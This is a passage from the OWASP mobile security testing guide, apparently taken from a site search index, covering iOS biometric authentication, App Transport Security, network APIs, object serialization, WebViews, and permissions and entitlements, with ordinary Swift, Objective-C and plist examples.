Fingerprint authentication on iOS is known as Touch ID. The fingerprint ID sensor is operated by the SecureEnclave security coprocessor and does not expose fingerprint data to any other parts of the system. Next to Touch ID, Apple introduced Face ID: which allows authentication based on facial recognition. Both use similar APIs on an application level, the actual method of storing the data and retrieving the data (e.g. facial data or fingerprint related data is different).
Developers have two options for incorporating Touch ID/Face ID authentication:
LocalAuthentication.framework
is a high-level API that can be used to authenticate the user via Touch ID. The app can't access any data associated with the enrolled fingerprint and is notified only whether authentication was successful.Security.framework
is a lower level API to access keychain services. This is a secure option if your app needs to protect some secret data with biometric authentication, since the access control is managed on a system-level and can not easily be bypassed. Security.framework
has a C API, but there are several open source wrappers available, making access to the keychain as simple as to NSUserDefaults. Security.framework
underlies LocalAuthentication.framework
; Apple recommends to default to higher-level APIs whenever possible.Please be aware that using either the LocalAuthentication.framework
or the Security.framework
, will be a control that can be bypassed by an attacker as it does only return a boolean and no data to proceed with. See Don't touch me that way, by David Lindner et al for more details.
The Local Authentication framework provides facilities for requesting a passphrase or Touch ID authentication from users. Developers can display and utilize an authentication prompt by utilizing the function evaluatePolicy
of the LAContext
class.
Two available policies define acceptable forms of authentication:
deviceOwnerAuthentication
(Swift) or LAPolicyDeviceOwnerAuthentication
(Objective-C): When available, the user is prompted to perform Touch ID authentication. If Touch ID is not activated, the device passcode is requested instead. If the device passcode is not enabled, policy evaluation fails.
deviceOwnerAuthenticationWithBiometrics
(Swift) or LAPolicyDeviceOwnerAuthenticationWithBiometrics
(Objective-C): Authentication is restricted to biometrics where the user is prompted for Touch ID.
The evaluatePolicy
function returns a boolean value indicating whether the user has authenticated successfully.
The Apple Developer website offers code samples for both Swift and Objective-C. A typical implementation in Swift looks as follows.
let context = LAContext()\nvar error: NSError?\n\nguard context.canEvaluatePolicy(.deviceOwnerAuthentication, error: &error) else {\n // Could not evaluate policy; look at error and present an appropriate message to user\n}\n\ncontext.evaluatePolicy(.deviceOwnerAuthentication, localizedReason: \"Please, pass authorization to enter this area\") { success, evaluationError in\n guard success else {\n // User did not authenticate successfully, look at evaluationError and take appropriate action\n }\n\n // User authenticated successfully, take appropriate action\n}\n
"},{"location":"MASTG/iOS/0x06f-Testing-Local-Authentication/#using-keychain-services-for-local-authentication","title":"Using Keychain Services for Local Authentication","text":"The iOS keychain APIs can (and should) be used to implement local authentication. During this process, the app stores either a secret authentication token or another piece of secret data identifying the user in the keychain. In order to authenticate to a remote service, the user must unlock the keychain using their passphrase or fingerprint to obtain the secret data.
The keychain allows saving items with the special SecAccessControl
attribute, which will allow access to the item from the keychain only after the user has passed Touch ID authentication (or passcode, if such a fallback is allowed by attribute parameters).
In the following example we will save the string \"test_strong_password\" to the keychain. The string can be accessed only on the current device while the passcode is set (kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
parameter) and after Touch ID authentication for the currently enrolled fingers only (SecAccessControlCreateFlags.biometryCurrentSet
parameter):
// 1. Create the AccessControl object that will represent authentication settings\n\nvar error: Unmanaged<CFError>?\n\nguard let accessControl = SecAccessControlCreateWithFlags(kCFAllocatorDefault,\n kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,\n SecAccessControlCreateFlags.biometryCurrentSet,\n &error) else {\n // failed to create AccessControl object\n\n return\n}\n\n// 2. Create the keychain services query. Pay attention that kSecAttrAccessControl is mutually exclusive with kSecAttrAccessible attribute\n\nvar query: [String: Any] = [:]\n\nquery[kSecClass as String] = kSecClassGenericPassword\nquery[kSecAttrLabel as String] = \"com.me.myapp.password\" as CFString\nquery[kSecAttrAccount as String] = \"OWASP Account\" as CFString\nquery[kSecValueData as String] = \"test_strong_password\".data(using: .utf8)! as CFData\nquery[kSecAttrAccessControl as String] = accessControl\n\n// 3. Save the item\n\nlet status = SecItemAdd(query as CFDictionary, nil)\n\nif status == noErr {\n // successfully saved\n} else {\n // error while saving\n}\n\n// 4. Now we can request the saved item from the keychain. Keychain services will present the authentication dialog to the user and return data or nil depending on whether a suitable fingerprint was provided or not.\n\n// 5. Create the query\nvar query = [String: Any]()\nquery[kSecClass as String] = kSecClassGenericPassword\nquery[kSecReturnData as String] = kCFBooleanTrue\nquery[kSecAttrAccount as String] = \"My Name\" as CFString\nquery[kSecAttrLabel as String] = \"com.me.myapp.password\" as CFString\nquery[kSecUseOperationPrompt as String] = \"Please, pass authorisation to enter this area\" as CFString\n\n// 6. Get the item\nvar queryResult: AnyObject?\nlet status = withUnsafeMutablePointer(to: &queryResult) {\n SecItemCopyMatching(query as CFDictionary, UnsafeMutablePointer($0))\n}\n\nif status == noErr {\n let password = String(data: queryResult as! Data, encoding: .utf8)!\n // successfully received password\n} else {\n // authorization not passed\n}\n
"},{"location":"MASTG/iOS/0x06f-Testing-Local-Authentication/#objective-c","title":"Objective-C","text":"// 1. Create the AccessControl object that will represent authentication settings\nCFErrorRef *err = nil;\n\nSecAccessControlRef sacRef = SecAccessControlCreateWithFlags(kCFAllocatorDefault,\n kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,\n kSecAccessControlUserPresence,\n err);\n\n// 2. Create the keychain services query. Pay attention that kSecAttrAccessControl is mutually exclusive with kSecAttrAccessible attribute\nNSDictionary* query = @{\n (_ _bridge id)kSecClass: (__bridge id)kSecClassGenericPassword,\n (__bridge id)kSecAttrLabel: @\"com.me.myapp.password\",\n (__bridge id)kSecAttrAccount: @\"OWASP Account\",\n (__bridge id)kSecValueData: [@\"test_strong_password\" dataUsingEncoding:NSUTF8StringEncoding],\n (__bridge id)kSecAttrAccessControl: (__bridge_transfer id)sacRef\n};\n\n// 3. Save the item\nOSStatus status = SecItemAdd((__bridge CFDictionaryRef)query, nil);\n\nif (status == noErr) {\n // successfully saved\n} else {\n // error while saving\n}\n\n// 4. Now we can request the saved item from the keychain. Keychain services will present the authentication dialog to the user and return data or nil depending on whether a suitable fingerprint was provided or not.\n\n// 5. Create the query\nNSDictionary *query = @{(__bridge id)kSecClass: (__bridge id)kSecClassGenericPassword,\n (__bridge id)kSecReturnData: @YES,\n (__bridge id)kSecAttrAccount: @\"My Name1\",\n (__bridge id)kSecAttrLabel: @\"com.me.myapp.password\",\n (__bridge id)kSecUseOperationPrompt: @\"Please, pass authorisation to enter this area\" };\n\n// 6. Get the item\nCFTypeRef queryResult = NULL;\nOSStatus status = SecItemCopyMatching((__bridge CFDictionaryRef)query, &queryResult);\n\nif (status == noErr){\n NSData* resultData = ( __bridge_transfer NSData* )queryResult;\n NSString* password = [[NSString alloc] initWithData:resultData encoding:NSUTF8StringEncoding];\n NSLog(@\"%@\", password);\n} else {\n NSLog(@\"Something went wrong\");\n}\n
"},{"location":"MASTG/iOS/0x06f-Testing-Local-Authentication/#note-regarding-temporariness-of-keys-in-the-keychain","title":"Note regarding temporariness of keys in the Keychain","text":"Unlike macOS and Android, iOS does not support temporariness of an item's accessibility in the keychain: when there is no additional security check when entering the keychain (e.g. kSecAccessControlUserPresence
or similar is set), then once the device is unlocked, a key will be accessible.
Almost every iOS app acts as a client to one or more remote services. As this network communication usually takes place over untrusted networks such as public Wi-Fi, classical network based-attacks become a potential issue.
Most modern mobile apps use variants of HTTP-based web services, as these protocols are well-documented and supported.
"},{"location":"MASTG/iOS/0x06g-Testing-Network-Communication/#ios-app-transport-security","title":"iOS App Transport Security","text":"Starting with iOS 9, Apple introduced App Transport Security (ATS) which is a set of security checks enforced by the operating system for connections made using the URL Loading System (typically via URLSession
) to always use HTTPS. Apps should follow Apple's best practices to properly secure their connections.
Watch ATS Introductory Video from the Apple WWDC 2015.
ATS performs default server trust evaluation and requires a minimum set of security requirements.
Default Server Trust Evaluation:
When an app connects to a remote server, the server provides its identity using an X.509 digital certificate. The ATS default server trust evaluation includes validating that the certificate:
Minimum Security Requirements for Connections:
ATS will block connections that further fail to meet a set of minimum security requirements including:
Certificate validity checking:
According to Apple, \"evaluating the trusted status of a TLS certificate is performed in accordance with established industry standards, as set out in RFC 5280, and incorporates emerging standards such as RFC 6962 (Certificate Transparency). In iOS 11 or later, Apple devices are periodically updated with a current list of revoked and constrained certificates. The list is aggregated from certificate revocation lists (CRLs), which are published by each of the built-in root certificate authorities trusted by Apple, as well as by their subordinate CA issuers. The list may also include other constraints at Apple\u2019s discretion. This information is consulted whenever a network API function is used to make a secure connection. If there are too many revoked certificates from a CA to list individually, a trust evaluation may instead require that an online certificate status response (OCSP) is needed, and if the response isn\u2019t available, the trust evaluation will fail.\"
"},{"location":"MASTG/iOS/0x06g-Testing-Network-Communication/#when-does-ats-not-apply","title":"When does ATS not apply?","text":"When using lower-level APIs: ATS only applies to the URL Loading System including URLSession and APIs layered on top of them. It does not apply to apps that use lower-level APIs (like BSD Sockets), including those that implement TLS on top of those lower-level APIs (see section \"Using ATS in Apple Frameworks\" from the Archived Apple Developer Documentation).
When connecting to IP addresses, unqualified domain names or local hosts: ATS applies only to connections made to public host names (see section \"Availability of ATS for Remote and Local Connections\" from the Archived Apple Developer Documentation). The system does not provide ATS protection to connections made to:
When including ATS Exceptions: If the app uses the ATS compatible APIs, it can still disable ATS for specific scenarios using ATS Exceptions.
Learn more:
ATS restrictions can be disabled by configuring exceptions in the Info.plist
file under the NSAppTransportSecurity
key. These exceptions can be applied to:
ATS exceptions can be applied globally or per domain basis. The application can globally disable ATS, but opt in for individual domains. The following listing from Apple Developer documentation shows the structure of the NSAppTransportSecurity
dictionary.
NSAppTransportSecurity : Dictionary {\n NSAllowsArbitraryLoads : Boolean\n NSAllowsArbitraryLoadsForMedia : Boolean\n NSAllowsArbitraryLoadsInWebContent : Boolean\n NSAllowsLocalNetworking : Boolean\n NSExceptionDomains : Dictionary {\n <domain-name-string> : Dictionary {\n NSIncludesSubdomains : Boolean\n NSExceptionAllowsInsecureHTTPLoads : Boolean\n NSExceptionMinimumTLSVersion : String\n NSExceptionRequiresForwardSecrecy : Boolean // Default value is YES\n NSRequiresCertificateTransparency : Boolean\n }\n }\n}\n
Source: Apple Developer Documentation.
The following table summarizes the global ATS exceptions. For more information about these exceptions, please refer to table 2 in the official Apple developer documentation.
Key DescriptionNSAllowsArbitraryLoads
Disable ATS restrictions globally excepts for individual domains specified under NSExceptionDomains
NSAllowsArbitraryLoadsInWebContent
Disable ATS restrictions for all the connections made from web views NSAllowsLocalNetworking
Allow connection to unqualified domain names and .local domains NSAllowsArbitraryLoadsForMedia
Disable all ATS restrictions for media loaded through the AV Foundations framework The following table summarizes the per-domain ATS exceptions. For more information about these exceptions, please refer to table 3 in the official Apple developer documentation.
Key DescriptionNSIncludesSubdomains
Indicates whether ATS exceptions should apply to subdomains of the named domain NSExceptionAllowsInsecureHTTPLoads
Allows HTTP connections to the named domain, but does not affect TLS requirements NSExceptionMinimumTLSVersion
Allows connections to servers with TLS versions less than 1.2 NSExceptionRequiresForwardSecrecy
Disable perfect forward secrecy (PFS) Justifying Exceptions:
Starting from January 1 2017, Apple App Store review requires justification if one of the following ATS exceptions are defined.
NSAllowsArbitraryLoads
NSAllowsArbitraryLoadsForMedia
NSAllowsArbitraryLoadsInWebContent
NSExceptionAllowsInsecureHTTPLoads
NSExceptionMinimumTLSVersion
This must be carefully revised to determine if it's indeed part of the app intended purpose. Apple warns about exceptions reducing the security of the apps and advises to configure exceptions only when needed and prefer to server fixes when faced with an ATS failure.
Example:
In the following example, ATS is globally enabled (there's no global NSAllowsArbitraryLoads
defined) but an exception is explicitly set for the example.com
domain (and its subdomains). Considering that the domain is owned by the application developers and there's a proper justification this exception would be acceptable, since it maintains all the benefits of ATS for all other domains. However, it would be always preferable to fix the server as indicated above.
<key>NSAppTransportSecurity</key>\n<dict>\n <key>NSExceptionDomains</key>\n <dict>\n <key>example.com</key>\n <dict>\n <key>NSIncludesSubdomains</key>\n <true/>\n <key>NSExceptionMinimumTLSVersion</key>\n <string>TLSv1.2</string>\n <key>NSExceptionAllowsInsecureHTTPLoads</key>\n <true/>\n <key>NSExceptionRequiresForwardSecrecy</key>\n <true/>\n </dict>\n </dict>\n</dict>\n
For more information on ATS exceptions please consult section \"Configure Exceptions Only When Needed; Prefer Server Fixes\" from the article \"Preventing Insecure Network Connections\" in the Apple Developer Documentation and the blog post on ATS.
"},{"location":"MASTG/iOS/0x06g-Testing-Network-Communication/#server-trust-evaluation","title":"Server Trust Evaluation","text":"ATS imposes extended security checks that supplement the default server trust evaluation prescribed by the Transport Layer Security (TLS) protocol. Loosening ATS restrictions reduces the security of the app. Apps should prefer alternative ways to improve server security before adding ATS exceptions.
The Apple Developer Documentation explains that an app can use URLSession
to automatically handle server trust evaluation. However, apps are also able to customize that process, for example they can:
References:
Since iOS 12.0 the Network framework and the URLSession
class provide methods to load network and URL requests asynchronously and synchronously. Older iOS versions can utilize the Sockets API.
The Network
framework was introduced at The Apple Worldwide Developers Conference (WWDC) in 2018 and is a replacement to the Sockets API. This low-level networking framework provides classes to send and receive data with built in dynamic networking, security and performance support.
TLS 1.3 is enabled by default in the Network
framework, if the argument using: .tls
is used. It is the preferred option over the legacy Secure Transport framework.
URLSession
was built upon the Network
framework and utilizes the same transport services. The class also uses TLS 1.3 by default, if the endpoint is HTTPS.
URLSession
should be used for HTTP and HTTPS connections, instead of utilizing the Network
framework directly. The URLSession
class natively supports both URL schemes and is optimized for such connections. It requires less boilerplate code, reducing the possibility for errors and ensuring secure connections by default. The Network
framework should only be used when there are low-level and/or advanced networking requirements.
The official Apple documentation includes examples of using the Network
framework to implement netcat and URLSession
to fetch website data into memory.
Enforced updating can be helpful when it comes to public key pinning (see the Testing Network communication for more details) when a pin has to be refreshed due to a certificate/public key rotation. Additionally, vulnerabilities are easily patched by means of forced updates.
The challenge with iOS however, is that Apple does not provide any APIs yet to automate this process, instead, developers will have to create their own mechanism, such as described at various blogs which boil down to looking up properties of the app using http://itunes.apple.com/lookup\\?id\\<BundleId>
or third party libraries, such as Siren and react-native-appstore-version-checker. Most of these implementations will require a certain given version offered by an API or just \"latest in the appstore\", which means users can be frustrated with having to update the app, even though no business/security need for an update is truly there.
Please note that newer versions of an application will not fix security issues that are living in the backends to which the app communicates. Allowing an app not to communicate with it might not be enough. Having proper API-lifecycle management is key here. Similarly, when a user is not forced to update, do not forget to test older versions of your app against your API and/or use proper API versioning.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence","title":"Object Persistence","text":"There are several ways to persist an object on iOS:
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-encoding","title":"Object Encoding","text":"iOS comes with two protocols for object encoding and decoding for Objective-C or NSObject
s: NSCoding
and NSSecureCoding
. When a class conforms to either of the protocols, the data is serialized to NSData
: a wrapper for byte buffers. Note that Data
in Swift is the same as NSData
or its mutable counterpart: NSMutableData
. The NSCoding
protocol declares the two methods that must be implemented in order to encode/decode its instance-variables. A class using NSCoding
needs to implement NSObject
or be annotated as an @objc class. The NSCoding
protocol requires to implement encode and init as shown below.
class CustomPoint: NSObject, NSCoding {\n\n //required by NSCoding:\n func encode(with aCoder: NSCoder) {\n aCoder.encode(x, forKey: \"x\")\n aCoder.encode(name, forKey: \"name\")\n }\n\n var x: Double = 0.0\n var name: String = \"\"\n\n init(x: Double, name: String) {\n self.x = x\n self.name = name\n }\n\n // required by NSCoding: initialize members using a decoder.\n required convenience init?(coder aDecoder: NSCoder) {\n guard let name = aDecoder.decodeObject(forKey: \"name\") as? String\n else {return nil}\n self.init(x:aDecoder.decodeDouble(forKey:\"x\"),\n name:name)\n }\n\n //getters/setters/etc.\n}\n
The issue with NSCoding
is that the object is often already constructed and inserted before you can evaluate the class-type. This allows an attacker to easily inject all sorts of data. Therefore, the NSSecureCoding
protocol has been introduced. When conforming to NSSecureCoding
you need to include:
static var supportsSecureCoding: Bool {\n return true\n}\n
when init(coder:)
is part of the class. Next, when decoding the object, a check should be made, e.g.:
let obj = decoder.decodeObject(of:MyClass.self, forKey: \"myKey\")\n
The conformance to NSSecureCoding
ensures that objects being instantiated are indeed the ones that were expected. However, there are no additional integrity checks done over the data and the data is not encrypted. Therefore, any secret data needs additional encryption and data of which the integrity must be protected, should get an additional HMAC.
Note, when NSData
(Objective-C) or the keyword let
(Swift) is used: then the data is immutable in memory and cannot be easily removed.
NSKeyedArchiver
is a concrete subclass of NSCoder
and provides a way to encode objects and store them in a file. The NSKeyedUnarchiver
decodes the data and recreates the original data. Let's take the example of the NSCoding
section and now archive and unarchive them:
// archiving:\nNSKeyedArchiver.archiveRootObject(customPoint, toFile: \"/path/to/archive\")\n\n// unarchiving:\nguard let customPoint = NSKeyedUnarchiver.unarchiveObjectWithFile(\"/path/to/archive\") as?\n CustomPoint else { return nil }\n
When decoding a keyed archive, because values are requested by name, values can be decoded out of sequence or not at all. Keyed archives, therefore, provide better support for forward and backward compatibility. This means that an archive on disk could actually contain additional data which is not detected by the program, unless the key for that given data is provided at a later stage.
Note that additional protection needs to be in place to secure the file in case of confidential data, as the data is not encrypted within the file. See the chapter \"Data Storage on iOS\" for more details.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#codable","title":"Codable","text":"With Swift 4, the Codable
type alias arrived: it is a combination of the Decodable
and Encodable
protocols. A String
, Int
, Double
, Date
, Data
and URL
are Codable
by nature: meaning they can easily be encoded and decoded without any additional work. Let's take the following example:
struct CustomPointStruct:Codable {\n var x: Double\n var name: String\n}\n
By adding Codable
to the inheritance list for the CustomPointStruct
in the example, the methods init(from:)
and encode(to:)
are automatically supported. Fore more details about the workings of Codable
check the Apple Developer Documentation. The Codable
s can easily be encoded / decoded into various representations: NSData
using NSCoding
/NSSecureCoding
, JSON, Property Lists, XML, etc. See the subsections below for more details.
There are various ways to encode and decode JSON within iOS by using different 3rd party libraries:
The libraries differ in their support for certain versions of Swift and Objective-C, whether they return (im)mutable results, speed, memory consumption and actual library size. Again, note in case of immutability: confidential information cannot be removed from memory easily.
Next, Apple provides support for JSON encoding/decoding directly by combining Codable
together with a JSONEncoder
and a JSONDecoder
:
struct CustomPointStruct: Codable {\n var point: Double\n var name: String\n}\n\nlet encoder = JSONEncoder()\nencoder.outputFormatting = .prettyPrinted\n\nlet test = CustomPointStruct(point: 10, name: \"test\")\nlet data = try encoder.encode(test)\nlet stringData = String(data: data, encoding: .utf8)\n\n// stringData = Optional ({\n// \"point\" : 10,\n// \"name\" : \"test\"\n// })\n
JSON itself can be stored anywhere, e.g., a (NoSQL) database or a file. You just need to make sure that any JSON that contains secrets has been appropriately protected (e.g., encrypted/HMACed). See the chapter \"Data Storage on iOS\" for more details.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#property-lists-and-codable","title":"Property Lists and Codable","text":"You can persist objects to property lists (also called plists in previous sections). You can find two examples below of how to use it:
// archiving:\nlet data = NSKeyedArchiver.archivedDataWithRootObject(customPoint)\nNSUserDefaults.standardUserDefaults().setObject(data, forKey: \"customPoint\")\n\n// unarchiving:\n\nif let data = NSUserDefaults.standardUserDefaults().objectForKey(\"customPoint\") as? NSData {\n let customPoint = NSKeyedUnarchiver.unarchiveObjectWithData(data)\n}\n
In this first example, the NSUserDefaults
are used, which is the primary property list. We can do the same with the Codable
version:
struct CustomPointStruct: Codable {\n var point: Double\n var name: String\n }\n\n var points: [CustomPointStruct] = [\n CustomPointStruct(point: 1, name: \"test\"),\n CustomPointStruct(point: 2, name: \"test\"),\n CustomPointStruct(point: 3, name: \"test\"),\n ]\n\n UserDefaults.standard.set(try? PropertyListEncoder().encode(points), forKey: \"points\")\n if let data = UserDefaults.standard.value(forKey: \"points\") as? Data {\n let points2 = try? PropertyListDecoder().decode([CustomPointStruct].self, from: data)\n }\n
Note that plist
files are not meant to store secret information. They are designed to hold user preferences for an app.
There are multiple ways to do XML encoding. Similar to JSON parsing, there are various third party libraries, such as:
They vary in terms of speed, memory usage, object persistence and more important: differ in how they handle XML external entities. See XXE in the Apple iOS Office viewer as an example. Therefore, it is key to disable external entity parsing if possible. See the OWASP XXE prevention cheatsheet for more details. Next to the libraries, you can make use of Apple's XMLParser
class
When not using third party libraries, but Apple's XMLParser
, be sure to let shouldResolveExternalEntities
return false
.
There are various ORM-like solutions for iOS. The first one is Realm, which comes with its own storage engine. Realm has settings to encrypt the data as explained in Realm's documentation. This allows for handling secure data. Note that the encryption is turned off by default.
Apple itself supplies CoreData
, which is well explained in the Apple Developer Documentation. It supports various storage backends as described in Apple's Persistent Store Types and Behaviors documentation. The issue with the storage backends recommended by Apple, is that none of the type of data stores is encrypted, nor checked for integrity. Therefore, additional actions are necessary in case of confidential data. An alternative can be found in project iMas, which does supply out of the box encryption.
Protocol Buffers by Google, are a platform- and language-neutral mechanism for serializing structured data by means of the Binary Data Format. They are available for iOS by means of the Protobuf library. There have been a few vulnerabilities with Protocol Buffers, such as CVE-2015-5237. Note that Protocol Buffers do not provide any protection for confidentiality as no built-in encryption is available.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#webviews","title":"WebViews","text":"WebViews are in-app browser components for displaying interactive web content. They can be used to embed web content directly into an app's user interface. iOS WebViews support JavaScript execution by default, so script injection and Cross-Site Scripting attacks can affect them.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#types-of-webviews","title":"Types of WebViews","text":"There are multiple ways to include a WebView in an iOS application:
UIWebView
WKWebView
SFSafariViewController
UIWebView
is deprecated starting on iOS 12 and should not be used. Make sure that either WKWebView
or SFSafariViewController
are used to embed web content. In addition to that, JavaScript cannot be disabled for UIWebView
which is another reason to refrain from using it.
WKWebView
was introduced with iOS 8 and is the appropriate choice for extending app functionality, controlling displayed content (i.e., prevent the user from navigating to arbitrary URLs) and customizing.
WKWebView
comes with several security advantages over UIWebView
:
javaScriptEnabled
property of WKWebView
, it can be completely disabled, preventing all script injection flaws.JavaScriptCanOpenWindowsAutomatically
can be used to prevent JavaScript from opening new windows, such as pop-ups.hasOnlySecureContent
property can be used to verify resources loaded by the WebView are retrieved through encrypted connections.WKWebView
implements out-of-process rendering, so memory corruption bugs won't affect the main app process.A JavaScript Bridge can be enabled when using WKWebView
and UIWebView
. See Section \"Native Functionality Exposed Through WebViews\" below for more information.
SFSafariViewController
is available starting on iOS 9 and should be used to provide a generalized web viewing experience. These WebViews can be easily spotted as they have a characteristic layout which includes the following elements:
There are a couple of things to consider:
SFSafariViewController
and this is one of the reasons why the usage of WKWebView
is recommended when the goal is extending the app's user interface.SFSafariViewController
also shares cookies and other website data with Safari.SFSafariViewController
are not visible to the app, which cannot access AutoFill data, browsing history, or website data.SFSafariViewController
s may not be hidden or obscured by other views or layers.This should be sufficient for an app analysis and therefore, SFSafariViewController
s are out of scope for the Static and Dynamic Analysis sections.
Enabling Safari web inspection on iOS allows you to inspect the contents of a WebView remotely from a macOS device. By default, you can view the contents of any page loaded into the Safari app because the Safari app has the get-task-allowed
entitlement. Applications installed from the App store will however not have this entitlement, and so cannot be attached to. On jailbroken devices, this entitlement can be added to any application by installing the Inspectorplus tweak from the BigBoss repo.
Enabling the Safari Web Inspector is especially interesting in applications that expose native APIs using a JavaScript bridge, for example in hybrid applications.
To activate the web inspection you have to follow these steps:
To open the web inspector and debug a WebView:
Now you're able to debug the WebView as you would with a regular web page on your desktop browser.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#native-functionality-exposed-through-webviews","title":"Native Functionality Exposed Through WebViews","text":"In iOS 7, Apple introduced APIs that allow communication between the JavaScript runtime in the WebView and the native Swift or Objective-C objects. If these APIs are used carelessly, important functionality might be exposed to attackers who manage to inject malicious scripts into the WebView (e.g., through a successful Cross-Site Scripting attack).
Both UIWebView
and WKWebView
provide a means of communication between the WebView and the native app. Any important data or native functionality exposed to the WebView JavaScript engine would also be accessible to rogue JavaScript running in the WebView.
UIWebView:
There are two fundamental ways of how native code and JavaScript can communicate:
JSContext
, JavaScriptCore automatically wraps the block in a JavaScript function.JSExport
-inherited protocol are mapped to JavaScript objects that are available to all JavaScript code. Modifications of objects that are in the JavaScript environment are reflected in the native environment.Note that only class members defined in the JSExport
protocol are made accessible to JavaScript code.
WKWebView:
JavaScript code in a WKWebView
can still send messages back to the native app but in contrast to UIWebView
, it is not possible to directly reference the JSContext
of a WKWebView
. Instead, communication is implemented using a messaging system and using the postMessage
function, which automatically serializes JavaScript objects into native Objective-C or Swift objects. Message handlers are configured using the method add(_ scriptMessageHandler:name:)
.
In contrast to Android, where each app runs on its own user ID, iOS makes all third-party apps run under the non-privileged mobile
user. Each app has a unique home directory and is sandboxed, so that they cannot access protected system resources or files stored by the system or by other apps. These restrictions are implemented via sandbox policies (aka. profiles), which are enforced by the Trusted BSD (MAC) Mandatory Access Control Framework via a kernel extension. iOS applies a generic sandbox profile to all third-party apps called container. Access to protected resources or data (some also known as app capabilities) is possible, but it's strictly controlled via special permissions known as entitlements.
Some permissions can be configured by the app's developers (e.g. Data Protection or Keychain Sharing) and will directly take effect after the installation. However, for others, the user will be explicitly asked the first time the app attempts to access a protected resource, for example:
Even though Apple urges to protect the privacy of the user and to be very clear on how to ask permissions, it can still be the case that an app requests too many of them for non-obvious reasons.
Verifying the use of some permissions such as Camera, Photos, Calendar Data, Motion, Contacts or Speech Recognition should be pretty straightforward as it should be obvious if the app requires them to fulfill its tasks. Let's consider the following examples regarding the Photos permission, which, if granted, gives the app access to all user photos in the \"Camera Roll\" (the iOS default system-wide location for storing photos):
UIImagePickerController
(iOS 11+) and its modern replacement PHPickerViewController
(iOS 14+). These APIs run on a separate process from your app and by using them, the app gets read-only access exclusively to the images selected by the user instead of to the whole \"Camera Roll\". This is considered a best practice to avoid requesting unnecessary permissions.Verifying other permissions like Bluetooth or Location require a deeper source code inspection. They may be required for the app to properly function but the data being handled by those tasks might not be properly protected.
When collecting or simply handling (e.g. caching) sensitive data, an app should provide proper mechanisms to give the user control over it, e.g. to be able to revoke access or to delete it. However, sensitive data might not only be stored or cached but also sent over the network. In both cases, it has to be ensured that the app properly follows the appropriate best practices, which in this case involve implementing proper data protection and transport security. More information on how to protect this kind of data can be found in the chapter \"Network APIs\".
As you can see, using app capabilities and permissions mostly involve handling personal data, therefore being a matter of protecting the user's privacy. See the articles \"Protecting the User's Privacy\" and \"Accessing Protected Resources\" in Apple Developer Documentation for more details.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#device-capabilities","title":"Device Capabilities","text":"Device capabilities are used by the App Store to ensure that only compatible devices are listed and therefore are allowed to download the app. They are specified in the Info.plist
file of the app under the UIRequiredDeviceCapabilities
key.
<key>UIRequiredDeviceCapabilities</key>\n<array>\n <string>arm64</string>\n</array>\n
Typically you'll find the arm64
capability, meaning that the app is compiled for the arm64 instruction set.
For example, an app might be completely dependent on NFC to work (e.g. a \"NFC Tag Reader\" app). According to the archived iOS Device Compatibility Reference, NFC is only available starting on the iPhone 7 (and iOS 11). A developer might want to exclude all incompatible devices by setting the nfc
device capability.
Regarding testing, you can consider UIRequiredDeviceCapabilities
as a mere indication that the app is using some specific resources. Unlike the entitlements related to app capabilities, device capabilities do not confer any right or access to protected resources. Additional configuration steps might be required for that, which are very specific to each capability.
For example, if BLE is a core feature of the app, Apple's Core Bluetooth Programming Guide explains the different things to be considered:
bluetooth-le
device capability can be set in order to restrict non-BLE capable devices from downloading their app.bluetooth-peripheral
or bluetooth-central
(both UIBackgroundModes
) should be added if BLE background processing is required.However, this is not yet enough for the app to get access to the Bluetooth peripheral, the NSBluetoothPeripheralUsageDescription
key has to be included in the Info.plist
file, meaning that the user has to actively give permission. See \"Purpose Strings in the Info.plist File\" below for more information.
According to Apple's iOS Security Guide:
Entitlements are key value pairs that are signed in to an app and allow authentication beyond runtime factors, like UNIX user ID. Since entitlements are digitally signed, they can\u2019t be changed. Entitlements are used extensively by system apps and daemons to perform specific privileged operations that would otherwise require the process to run as root. This greatly reduces the potential for privilege escalation by a compromised system app or daemon.
Many entitlements can be set using the \"Summary\" tab of the Xcode target editor. Other entitlements require editing a target\u2019s entitlements property list file or are inherited from the iOS provisioning profile used to run the app.
Entitlement Sources:
Entitlement Destinations:
The Apple Developer Documentation also explains:
embedded.mobileprovision
).For example, if you want to set the \"Default Data Protection\" capability, you would need to go to the Capabilities tab in Xcode and enable Data Protection. This is directly written by Xcode to the <appname>.entitlements
file as the com.apple.developer.default-data-protection
entitlement with default value NSFileProtectionComplete
. In the IPA we might find this in the embedded.mobileprovision
as:
<key>Entitlements</key>\n<dict>\n ...\n <key>com.apple.developer.default-data-protection</key>\n <string>NSFileProtectionComplete</string>\n</dict>\n
For other capabilities such as HealthKit, the user has to be asked for permission, therefore it is not enough to add the entitlements, special keys and strings have to be added to the Info.plist
file of the app.
Purpose strings or_usage description strings_ are custom texts that are offered to users in the system's permission request alert when requesting permission to access protected data or resources.
If linking on or after iOS 10, developers are required to include purpose strings in their app's Info.plist
file. Otherwise, if the app attempts to access protected data or resources without having provided the corresponding purpose string, the access will fail and the app might even crash.
For an overview of the different purpose strings Info.plist keys available see Table 1-2 at the Apple App Programming Guide for iOS. Click on the provided links to see the full description of each key in the CocoaKeys reference.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#code-signing-entitlements-file","title":"Code Signing Entitlements File","text":"Certain capabilities require a code signing entitlements file (<appname>.entitlements
). It is automatically generated by Xcode but may be manually edited and/or extended by the developer as well.
Here is an example of entitlements file of the open source app Telegram including the App Groups entitlement (application-groups
):
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n...\n <key>com.apple.security.application-groups</key>\n <array>\n <string>group.ph.telegra.Telegraph</string>\n </array>\n</dict>\n...\n</plist>\n
